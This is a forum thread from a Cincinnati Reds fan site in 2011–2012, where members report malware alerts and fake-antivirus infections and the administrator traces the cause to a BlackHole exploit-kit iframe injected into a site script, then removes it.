One thing I am no longer going to do is leave my computer running 24/7. Up until this happened, I NEVER shut my computer off (only when going away on vacation, etc. where I would be away for like a week or better), but otherwise, my computer ran all the time. Now, anytime I leave or am going to be away from it for a while, I go ahead and shut it down. I've really narrowed out a lot of programs I had that were set to "start up @ start up" which could make starting my computer up seemingly take FOREVER, but now, I only have like one prog. the starts @ start up, so it takes no-time for my computer to boot up now which makes shutting it down/rebooting up no big deal now.

I hope the guy that said all of his parents files got wiped out reads this thread and tries the unhide.exe prog. - I would hate to see his parents "lose" their files, thinking they're gone when the malware has simply "hidden" them. I've had a HD crash before and lost hundreds and hundreds of files and I darn well KNOW what a total pain in the butt that is. It can be a damn near nightmare to be honest, depending upon how many/what type of files you have. Kinda makes a person give serious thought to signing up for one of those "Carbonite" type programs! They're pretty inexpensive and if a HD DOES actually fail, they have all of your files backed up for you! I very well might go ahead and sign up for one of those services, I just think it would be worth every penny!!!

Oh yeah Boss, thanks for keeping us all updated on this as well!

Take Care man!

No problem...thank you for the nice (and thorough) post.

HitByPitch
05-18-2011, 06:12 PM
My computer was attacked Saturday. It looked like my HD was crashing and a pop up prompted me to click to run anti-virus software. I'm not a computer techie but it looked fishy to me so I quickly shut down and ran a system restore. Not sure if it was the right thing to do or not but it seems to be okay now. All of my files and documents were lost but I found them today as hidden files. Just wanted to share about the hidden files...

Spiritedway
05-18-2011, 09:02 PM
Long time browser of this forum, first time poster.

I received this attack on Saturday as a guest browsing the forums.

I noticed it was taking a really long time to load the pages here, to the point of after waiting 3 minutes I eventually gave up quit the browser. Tried once more then quit again. (during the long loads it must have been installing)

I left for the store and when I came back I noticed my computer acting funny. About one out of every 10 clicks it sent me to a website I did not click on.

Then windows defender popped up and was telling me I had a few backdoor Trojans. Windows defender was not successful in getting rid of them so I looked for a different program.

Downloaded and ran free AVG anti-virus version and eventually got rid of it.

First trojan I've ever had that I know of. Sneaky people out there.

Anyhow, I love browsing the forums and will continue to visit.

Thanks, Jake.

Mario-Rijo
08-27-2011, 06:54 PM
Anyone experience any malware/virus issues as of late? I tried to log in here from another PC last night and believe I may have gotten some kind of virus just from starting to type my log on. It wouldn't allow me to finish typing it and then I had this fake (i'm assuming) window/alert pop up and couldn't close it so I hit the scan button attached to said alert and the next thing I know this thing is shutting down this PC due to "lack of hard drive space" or something along those lines (this after the scan took place). I eventually get the PC back up but now my desktop icons and programs are inaccessible (not even visible). Unfortunately it wasn't my PC and could be a big problem for me, anyone know of anything?

Also Macafee seemed to make note of something at that time as well.

KittyDuran
08-27-2011, 07:17 PM
I haven't tempted fate, certainly not at work. Only time other than using Tapatalk on the iPhone it's been on Chrome (very limited).

jojo
08-27-2011, 07:24 PM
Anyone experience any malware/virus issues as of late? I tried to log in here from another PC last night and believe I may have gotten some kind of virus just from starting to type my log on. It wouldn't allow me to finish typing it and then I had this fake (i'm assuming) window/alert pop up and couldn't close it so I hit the scan button attached to said alert and the next thing I know this thing is shutting down this PC due to "lack of hard drive space" or something along those lines (this after the scan took place). I eventually get the PC back up but now my desktop icons and programs are inaccessible (not even visible). Unfortunately it wasn't my PC and could be a big problem for me, anyone know of anything?

Also Macafee seemed to make note of something at that time as well.

Whatever attacked probably changed the attributes on the files (I.e made them hidden which is easy enough to change back). Boot into safe mode and kill the with a malwarebytes scan and virus can...

jojo
08-27-2011, 07:27 PM
The attack might have changed programs in the start menu etc too so you might want o check that as well...

For anyone who uses Mozilla for their browser, it has a great extension called adblock plus. With a few free subscriptions, it seems to block all of the flash ads that contribute to malware attacks.

Mario-Rijo
08-27-2011, 07:28 PM
Whatever attacked probably changed the attributes on the files (I.e made them hidden which is easy enough to change back). Boot into safe mode and kill the with a malwarebytes scan and virus can...

Thanks for the info Jojo, that seems like what may have happened. Problem is I was at work and not sure I can pull that off myself without other potential issues. Man I am gonna get spanked for this one.

Mario-Rijo
08-28-2011, 07:29 AM
Yep find out that RZ was indeed the site we got the virus from, the IT guy confirmed it. Just a heads up for Boss and GIK. Again as soon as I started to type my screen name into the log in box it just started acting up/freezing up and I couldn't get past "mar" so keep an eye out.

cincyinco
08-28-2011, 02:22 PM
We had this issue previously with one of the flash ads.. Is it back?

Hillsdale87
08-28-2011, 03:37 PM
I got a virus warning when going to redszone on Friday. Luckily my anti-virus software caught it and deleted it, so no harm done.

cincyinco
08-28-2011, 04:24 PM
If this continues to happen, I would like to see alternative advertisement methods. I don't really care about ads either way, until they start compromising redzone members computers.

Boss-Hog
08-28-2011, 05:49 PM
I'm not saying that it didn't come from the ads, because I really don't know, but I tend to trust Google on something like providing ads that are safe from viruses and malware. What makes you positive it's due to the RedsZone Adsense ads?

dougdirt
08-28-2011, 06:29 PM
I'm not saying that it didn't come from the ads, because I really don't know, but I tend to trust Google on something like providing ads that are safe from viruses and malware. What makes you positive it's due to the RedsZone Adsense ads?

As someone who also used adsense in the past, there have been a few times where malware/viruses snuck themselves into the ads.

Boss-Hog
08-30-2011, 03:19 PM
All,

Until I'm able to pinpoint if the issue is coming from a virus and/or malware or from the AdSense ads, I've disabled the latter. Now that they've been temporarily turned off, please let me know immediately if you continue to encounter any of these problems, as that would be very helpful in identifying the root cause.

I'm going to request that our host run a complete virus and malware scan and go from there. I will keep you posted on the progress and I sincerely apologize for any problems this may have caused.

Boss-Hog
08-30-2011, 08:46 PM
Anyone experience any malware/virus issues as of late? I tried to log in here from another PC last night and believe I may have gotten some kind of virus just from starting to type my log on. It wouldn't allow me to finish typing it and then I had this fake (i'm assuming) window/alert pop up and couldn't close it so I hit the scan button attached to said alert and the next thing I know this thing is shutting down this PC due to "lack of hard drive space" or something along those lines (this after the scan took place). I eventually get the PC back up but now my desktop icons and programs are inaccessible (not even visible). Unfortunately it wasn't my PC and could be a big problem for me, anyone know of anything?

Also Macafee seemed to make note of something at that time as well.

Our host ran a scan and could not find any infected files. With regards to the quoted post, they wanted to know this:



Could you please specify in which URL you faced the issue ? If possible could you please get back to us with the exact steps(URL and login details) to recreate the issue at our end.

Mario-Rijo
08-31-2011, 08:31 AM
Our host ran a scan and could not find any infected files. With regards to the quoted post, they wanted to know this:


Could you please specify in which URL you faced the issue ? If possible could you please get back to us with the exact steps(URL and login details) to recreate the issue at our end.

I don't the exact URL, I mean I typed what I normally would www.redszone.com and then started to type in my screen name, got to about Mar and then it would lock up and I couldn't enter any further letters. I was thinking though that it's very possible that they haven't updated certain things as of late since technically we aren't supposed to need them updated very often because we don't really use them (because we aren't supposed to be on the 'net) like Adobe Flash player and if it was something in the Ads that would/could explain it right?

texasdave
08-31-2011, 02:09 PM
The same exact thing happened to me at work on Friday night. Was logging on to Redszone to check out the game thread when all computer-like heck broke loose. Powered off the computer and snuck away from that terminal quietly. I have Mozilla Firefox at home and have had no ill effects. Much to the consternation of the majority of posters on Sundeck. =)

Boss-Hog
08-31-2011, 06:12 PM
I've passed along this information to our host and we're continuing to keep ads disabled. Please let me know if you encounter any additional problems.

Mario-Rijo
08-31-2011, 06:39 PM
The same exact thing happened to me at work on Friday night. Was logging on to Redszone to check out the game thread when all computer-like heck broke loose. Powered off the computer and snuck away from that terminal quietly. I have Mozilla Firefox at home and have had no ill effects. Much to the consternation of the majority of posters on Sundeck. =)

Yeah they were also using IE, I use Firefox also.

Boss-Hog
08-31-2011, 06:43 PM
From our host:


Hello,

I could not find any issue in the domain, also I recommend you to use some browser addons to get rid of those kind of adds, scripts etc.

If you are using Firefox/Google-Chrome then you can use the following addons:

-----
For Firefox :

https://addons.mozilla.org/en-US/firefox/addon/adblock-plus/

For Google-Chrome:

https://chrome.google.com/webstore/detail/cfhdojbkjhnklbpkdaibdccddilifddb
-----

Please use those addons and tell us if it make any difference.

jojo
08-31-2011, 07:40 PM
Adblock plus works really well.....

Boss-Hog
08-31-2011, 09:54 PM
I've always used it, too, since switching to Firefox several years ago and I've never had any problems.

Boss-Hog
09-04-2011, 09:23 AM
From our host:


Hello,

Thanks for the update. From your update it is clear that only a handful of users having the problem, may be it's a local issue related to their machine.

Also I don't find any pop-up while browsing the domain redszone.com. Please advice him/her to use those addons.

If he/she still face any issue please get back to us with the exact steps to duplicate the issue at our end.

Vottomatic
09-06-2011, 08:56 PM
The last 2 times I've accessed Redszone, my AVG virus protector has detected and blocked a threat. I close it immediately, so I don't know what kind of threat it is. But that's the first time it's ever happened to me. And it's not happening when I open any other sites, and I peruse alot of sites when I'm on here.

Boss-Hog
09-06-2011, 10:12 PM
Thanks...I will follow up again with our host.

Boss-Hog
09-06-2011, 10:19 PM
At this point, I'm 99% it is tied to the Google AdSense ads. In the meantime, I've turned the ads back off until we can get this problem resolved.

It would be very helpful in pinpointing which ad(s) is causing the problem if you can tell me information such as the page or pages you're seeing the detected threats on: is it on the main forums listing, the thread listing within a forum or when a thread is displayed?

Sea Ray
09-07-2011, 12:12 PM
I'll chime in that I think I was affected as well. About two weeks ago my computer had a major meltdown so I gave it to my IT guy and he said:


All your desktop icons and user files had been set to 'hidden'. I ran a system restore and took it back to Friday 8/26 (after running a few different malware/virus scans to make sure the troublemaker was cleaned out). Sounds like it might be trying to pull a scam where everything disappears, then a pop-up will run a 'free' scan then offer to 'restore' all the missing info...for a fee. After I restored, I ended up finded a program that is supposed to be able to 'unhide' everything. It actually would be easy to reset the entire file system so nothing is hidden, but there are plenty of Windows system files that SHOULD be hidden so that would be a nightmare to try to identify and set everything to the correct status. Apparently the 'unhide' program uses info that the malware itself creates to allow everything to be restored.

When I mentioned what was posted here about the Malware attack he said "that sounds like that's it".

He was able to me back up running so all's well. That computer runs WIN XP with an AOL and IE browser, however I will say IE was one of the few programs that wasn't hidden after the attack. I don't know if that helps, but I wanted to give you all the info I could

Boss-Hog
09-07-2011, 07:25 PM
I'll chime in that I think I was affected as well. About two weeks ago my computer had a major meltdown so I gave it to my IT guy and he said:



When I mentioned what was posted here about the Malware attack he said "that sounds like that's it".

He was able to me back up running so all's well. That computer runs WIN XP with an AOL and IE browser, however I will say IE was one of the few programs that wasn't hidden after the attack. I don't know if that helps, but I wanted to give you all the info I could
Thanks for the heads up...and if RZ (or more likely, the Google AdSense ads we display) is indeed the cause, I sincerely apologize for the trouble.

top6
09-09-2011, 10:22 AM
FWIW, I had a similar experience to Sea Ray. I just gave my laptop to our IT people, so hopefully they will be able to fix it. At some point last Thursday (9/1) I must have download something and it just shut down every program (except Internet Explorer, similar to Sea Ray) and kept asking me to download "fixes" to scan and clean the computer. The fake diagnostic program was called Master Utilities. (Actually, from what I've read, it doesn't shut down everything but only makes it seem like everything is shut down and/or deleted. Of course, this distinction means nothing to people as un-technically savvy as me.) I did start having problems shortly after being on Reds Zone, but to be honest but for this thread I probably would not have tied the virus to this site. So it could have been from somewhere else entirely. But I thought would share just in case it would be helpful to someone.

Honestly, it was a pretty old/bad laptop and I don't think the virus protection was up to date, so lesson learned on that front.

Boss-Hog
09-12-2011, 06:06 PM
All,

I have re-enabled ads after making one major change: I have disabled all Google AdSense ads from Google certified networks. We're trying to pinpoint what in the ads has caused this problem, so your feedback would be extremely valuable...we're certainly not trying to infect anyone else (not that we were trying to infect anyone in the first place). Please let me us know if you continue or do not continue to have this problem from this point forward. Thanks again for your patience.

mth123
09-12-2011, 06:56 PM
All,

I have re-enabled ads after making one major change: I have disabled all Google AdSense ads from Google certified networks. We're trying to pinpoint what in the ads has caused this problem, so your feedback would be extremely valuable...we're certainly not trying to infect anyone else (not that we were trying to infect anyone in the first place). Please let me us know if you continue or do not continue to have this problem from this point forward. Thanks again for your patience.

Sorry Boss,

As soon as I got into Redszone AVG gave me a nessage that it blocked a threat. There was also a message on my screen from an unfamilar looking virus protection saying the sight was known for Phishing. I closed that window w/o clicking on anything and it seems to be ok. If it helps, the ad on my Screen was for Swanson Health Products.

Still a problem I'd guess.

Boss-Hog
09-12-2011, 07:07 PM
Thanks...that's helpful. I'm going to make another change to reenable what I disabled and disable something else and I'll let you know once it's complete.

Boss-Hog
09-12-2011, 07:18 PM
I've changed it to display only text-based ads instead of images and text-based ads. I suspect this will resolve the problem, but again, please let me know either way. Thanks...

Vottomatic
09-30-2011, 10:46 AM
My home computer does the same thing as mth's. AVG pops up and says it just blocked a threat.

My office computer has AVG, but maybe it's not updated. I have another protection package that scans the harddrive and it continues to find all kinds of malware and other stuff. It found 48 items this morning. Linking what is happening on my home computer to my office computer, and considering how often I'm on Redszone, I'm thinking these threats are coming from Redszone.

OesterPoster
09-30-2011, 11:13 AM
Since I'm the network admin, just noticed our Websense filtering software marking hits against www.redszone.com as the following this morning:


Category

Security Malicious Web Sites

Action

Category blocked

URL Hostname

www.redszone.com

Boss-Hog
09-30-2011, 06:15 PM
Thanks for confirming...we had gone to text-based ads only, but apparently that has not solved the issue, either. I've disabled them altogether until we can get a handle on this (which I thought we had). Thanks again and our apologies for the inconvenience.

OesterPoster
10-27-2011, 09:19 AM
Just an FYI, but our Websense software is flagging this site as "malicious" again.



Category

Security Malicious Web Sites


Action

Category blocked


URL Hostname

www.redszone.com

Boss-Hog
10-29-2011, 08:36 AM
Thank you for letting us know. We've had ads completely disabled for about a month, so if there's anything to it, that at least tells us that's not where the problem resides. We'll do everything we can to pinpoint the problem, but our efforts so far have been unsuccessful. We've opened tickets with our host and I've personally run virus scans on the entire site and this continues to happen. It's very frustrating...if anyone has any suggestions, I'm all ears.

Boss-Hog
10-29-2011, 08:43 AM
FWIW, Google identifies the site as clean (http://www.google.com/safebrowsing/diagnostic?site=redszone.com). So do Norton, AVG and every other online scanning utility I've found. Regardless, I'm in the process of doing another virus scan of the entire site, but I don't expect it to turn up anything.

Boss-Hog
10-29-2011, 09:16 AM
I finished scanning the entire site and nothing was found.

Boss-Hog
11-05-2011, 10:49 AM
All,

With the help of vBulletin, we may have finally tracked down the problem, so we have reenabled ads. Please let me know immediately if you encounter any unexpected problems, and if so, as many details as possible. Thanks...

Mario-Rijo
11-08-2011, 05:53 PM
All,

With the help of vBulletin, we may have finally tracked down the problem, so we have reenabled ads. Please let me know immediately if you encounter any unexpected problems, and if so, as many details as possible. Thanks...

Can you expound on what the problem was?

Boss-Hog
11-08-2011, 07:30 PM
Can you expound on what the problem was?
We've thought we had it figured out many times in the past, so I can't definitively say that it's resolved, but there was a file in a key place whose contents did not match what it should have. I've since replaced that file with a fresh version.

mth123
12-09-2011, 07:55 PM
AVG just shut my browser down when it detected a threat. I was in the Cahill thread when it happened, but I had not clicked on any of the links. I'm guessing it was one of the ads, but I wasn't really paying attention to which one was on screen.

Boss-Hog
12-10-2011, 08:09 AM
Anyone else had any problems? We haven't made any kind of recent changes that would account for something like this.


AVG just shut my browser down when it detected a threat. I was in the Cahill thread when it happened, but I had not clicked on any of the links. I'm guessing it was one of the ads, but I wasn't really paying attention to which one was on screen.

Vottomatic
01-14-2012, 02:38 PM
Just pulled up the page and my virus protector said it blocked a threat. Everything is fine now. Just wanted to point that out.

mth123
01-14-2012, 07:53 PM
Just pulled up the page and my virus protector said it blocked a threat. Everything is fine now. Just wanted to point that out.

I got one today too. Something about a "Black Hole" virus on this page.

Vottomatic
01-15-2012, 09:22 AM
I just pulled it up again and it said threat was blocked. Under type it called it "blackhole" something-er-uver.

KoryMac5
01-15-2012, 09:28 AM
Antivirus blocked this nasty bug yesterday. Here is the scoop from the antivirus forums:




Symantec Warns: BlackHole toolkit is spreading like wildfire (Trojan.Carberp)
on: 21. February 2011., 07:12:26

--------------------------------------------------------------------------------


Symantec has cautioned about the BlackHole toolkit, which has a powerful set of exploits and is spreading like wildfire. In a release issued on Monday, Symantec said that at present, it is the most prevalent exploit toolkit in the wild and can easily be compared with the likes of Neosploit and Phoenix in terms of the number of affected users.

Symantec recently reported the increasing utilization of sophisticated toolkits by criminals who would otherwise lack the technical expertise for cyber attacks, fueling a self-sustaining, profitable, and increasingly organized global economy.

Toolkits account for 61 per cent of all threat activity on malicious websites

In recent times, BlackHole has clearly emerged as the most used toolkit among hackers. The following IPS graph proves this fact, since more than 100,000 malicious hits are reported each day:




How BlackHole works:

When victims visits a clean site that has been injected with a malicious iFrame, they are redirected to the BlackHole exploit kit server. BlackHole obfuscates the exploits for popular vulnerabilities such as PDF, JAVA, HCP, MDAC, etc.

The page contains the code that redirects the user to download a malicious jar file. One of the classes inside the jar file extracts the value passed to it in the script, and then decodes it into a URL. This URL is then used to perform other malicious downloads.

The URL downloads Trojan.Carberp, which is a highly sophisticated Trojan that is being compared to ZeuS because of its ingenious techniques for avoiding detection.

The Trojan posts a unique ID to the command-and-control (C&C) server that will be used every time a transaction takes place between the Trojan and the C&C server. Next, the Trojan will post all of the running processes on the victim’s computer to the C&C server.


The Trojan then downloads three modules:

o stopav.plug – This module disables the antivirus installed on the victim’s computer.

o miniav.plug – Checks for the presence of other Trojans, such as Zeus, and if found, the Trojan deletes its competitor(s).

o passw.plug – It will log every username/password combination that is typed, as well as any URLs visited.


The C&C server sends the “multidownload” command to the Trojan:

o The first file downloaded is Trojan Hiloti (a.k.a. Trojan.Zefarch), which makes requests to a free file-hosting site.

o The second file downloaded (2.exe) is FakeAV

Vottomatic
01-16-2012, 10:15 AM
I just pulled up the site and it blocked another threat. Here is what my AVG protection says:

Threat was blocked!
File name: 65.75.141.139/Home/index.php
Threat name: Exploit Blackhole Exploit Kit (type 2095)

I hope this helps.

jojo
01-16-2012, 11:14 AM
Redszone is getting flagged by sopphos with every page navigated to....

Boss-Hog
01-16-2012, 11:17 AM
Thanks, I'll open a ticket with our host.

Boss-Hog
01-16-2012, 10:41 PM
Here's what our host had to say - honestly, I'm not sure where this leaves us, as I'm at a loss as to what direction to head next. If you have any suggestions, I'm all ears.


Hello,

I have scanned the server using RKhunter and couldn't find any malicious file from it.

---
[13:48:29] System checks summary
[13:48:29] =====================
[13:48:29]
[13:48:29] File properties checks...
[13:48:29] Required commands check failed
[13:48:29] Files checked: 135
[13:48:29] Suspect files: 6
[13:48:29]
[13:48:29] Rootkit checks...
[13:48:29] Rootkits checked : 248
[13:48:29] Possible rootkits: 0
[13:48:29]
[13:48:29] Applications checks...
[13:48:29] Applications checked: 9
[13:48:29] Suspect applications: 2
[13:48:29]
[13:48:29] The system checks took: 21 minutes and 23 seconds
[13:48:29]
[13:48:29] Info: End date is Mon Jan 16 13:48:29 EST 2012
---

I could see that the detected files are valid. I have scanned the "/home" folder using Clamscan. it also didn't detect any malicious file.
It only detected some mails which can be excluded.

---
[root@host ~]# tail test

----------- SCAN SUMMARY -----------
Known viruses: 1118387
Engine version: 0.97.1
Scanned directories: 1127
Scanned files: 70243
Infected files: 1323
Data scanned: 971.39 MB
Data read: 2921.17 MB (ratio 0.33:1)
Time: 573.856 sec (9 m 33 s)

[root@host ~]# grep -i found test > result
[root@host ~]#

[root@host ~]# cat result|grep -vi mail
[root@host ~]#
---

I have also scanned the website online. They also didn't detect any virus in the site "redszone.com". Please verify this using the following URLs.

---
http://www.avgthreatlabs.com/sitereports/domain/redszone.com/domain-search-widget/www.avg.com.au
http://www.urlvoid.com/
http://onlinelinkscan.com/
---

I could not find any malicious content in the server. Please let us know, if you need any further assistance.

Boss-Hog
01-17-2012, 06:36 AM
Here's what we need from you guys that are affected by this issue:


Hello,

As we have already updated, our scan results are showing nothing suspicious in the web root. We could confirm this from the following on line scanner from AVG antivirus solutions.

--
http://www.avgthreatlabs.com/sitereports/domain/redszone.com/domain-search-widget/www.avg.com.au
--

Can you get back to us with any one of the URLs (specific URLs) that your clients see problematic ?

dougdirt
01-17-2012, 09:51 AM
Could be coming from the ad's Boss. If that is the case, then it won't be on your server and won't be found.

No clue if there is anything to it, but it wouldn't be the first time that it has happened on the internet.

Boss-Hog
01-17-2012, 10:07 AM
We have considered that possibility, but we've looked into it on the AdSense side and have not seen any substantiated reports that confirm it's the ads. Given how widespread AdSense is, you'd think there would be others with the same problem.

Regardless, we have temporarily eliminated ads from a couple of users that have reported malware warnings and we want to see what this does. If anyone else has received these warnings and would like to do a similar test, please send me a PM.

Vottomatic
01-18-2012, 07:13 AM
Even with the ads gone, I'm still getting threats almost every time I open the site.

Boss-Hog
01-18-2012, 07:14 AM
Even with the ads gone, I'm still getting threats almost every time I open the site.
Anyone else having this? I think this rules out the ads as the root cause.

Vottomatic
01-18-2012, 06:45 PM
Well, I've opened it a bunch today and it hasn't happened since this morning when I posted about it.

Ravenlord
01-19-2012, 12:42 AM
Anyone else having this? I think this rules out the ads as the root cause.

first time i've posted in God-knows-when, and i had a worm alert pop on my Norton anti-virus on the Stubbs as #8 hitter thread i posted.

Boss-Hog
01-19-2012, 06:44 AM
All,

We need URLs from the site where the attacks are coming from; otherwise, there's nothing to connect the two. Thanks for your help.

Boss-Hog
01-19-2012, 11:05 AM
first time i've posted in God-knows-when, and i had a worm alert pop on my Norton anti-virus on the Stubbs as #8 hitter thread i posted.
Ravenlord, here's what our host had to say about this - if you (or anyone else affected) could supply the bolded information, we would greatly appreciate it. Thanks in advance.


Hello,

I have checked the server in detail. I could find that the URL "http://www.redszone.com/forums/showthread.php?t=93571" is being served by accessing the database.

I have checked the tables corresponding to the thread 93571. But I could not find any attachments or suspicious files that are linked to it. Please see the corresponding table pasted below.

--
mysql> select * from thread where threadid=93571;
+----------+---------------------------------------+------------+---------+--------+------+------------+--------------+------------+------------+------------+------------+-------+--------+-------+---------+--------+---------+-----------+--------+-------------+-------------+-----------------------------------+----------+----------+-------------+--------------+------------+--------+----------+----------------+
| threadid | title | lastpost | forumid | pollid | open | replycount | postusername | postuserid | lastposter | dateline | lastedit | views | iconid | notes | visible | sticky | votenum | votetotal | attach | closereason | firstpostid | similar | rss_feed | rss_date | hiddencount | deletedcount | lastpostid |wrdate | prefixid | taglist |
+----------+---------------------------------------+------------+---------+--------+------+------------+--------------+------------+------------+------------+------------+-------+--------+-------+---------+--------+---------+-----------+--------+-------------+-------------+-----------------------------------+----------+----------+-------------+--------------+------------+--------+----------+----------------+
| 93571 | Drew Stubbs is the perfect #8 hitter. | 1326948915 | 7 | 0 | 1 | 17 | WebScorpion | 28 | Ravenlord | 1326849525 | 1326860498 | 749 | 0 | | 1 | 0 | 0 | 0 | 0 | | 2526149 | 87133, 80390, 68946, 78719, 48675 | 0 | | 0 | 0 | 2526762 | | | lineup, stubbs |
+----------+---------------------------------------+------------+---------+--------+------+------------+--------------+------------+------------+------------+------------+-------+--------+-------+---------+--------+---------+-----------+--------+-------------+-------------+-----------------------------------+----------+----------+-------------+--------------+------------+--------+----------+----------------+
--

But I am still not sure about some of the values in the table. Can you please get back to us with the details of the malware that was detected by the antivirus ? This data would be available with the detection report of the antivirus.
Also please discuss this issue with a database programmer as the issue goes deeper in to the codes, we are facing more limitations.

Thank you for the understanding.

TRF
01-20-2012, 05:28 PM
I have a fresh install of windows 7, running symantec anti virus and have had no issues whatsoever. all my antivirus is up to date.

Ravenlord
01-21-2012, 12:31 AM
info sent, hope it works.

Boss-Hog
01-21-2012, 10:17 AM
info sent, hope it works.
Who did you send it to?

jojo
01-21-2012, 06:16 PM
I don't know if this is actually much help but this is what sophos just just flagged:

Virus/spyware 'Mal/Iframe-X' has been detected in "http://www.redszone.com/forums/clientscript/vbulletin_menu.php".

Boss-Hog
01-21-2012, 07:30 PM
I don't know if this is actually much help but this is what sophos just just flagged:

Virus/spyware 'Mal/Iframe-X' has been detected in "http://www.redszone.com/forums/clientscript/vbulletin_menu.php".

That helps...I will look into it.

Boss-Hog
01-21-2012, 09:02 PM
I've confirmed that was a malicious file and it has been removed. Please let me know if this continues, and if so, the URL(s).

BLEEDS
01-23-2012, 10:44 PM
I had one about a month ago - trojan got in and I have Windows 7 and McAfee - got the one where it takes over all your IE pages and asks you to install "Win7 security" or something, nasty little bugger.

Had to call McAfee and get it scrubbed, and they updated their database. Yikes.

Definitely had to do with ads. Ah well, yet another reason to pay the site fee - I figure I've broken even, given that I hadn't posted in awhile ;-)!

PEACE
-BLEEDS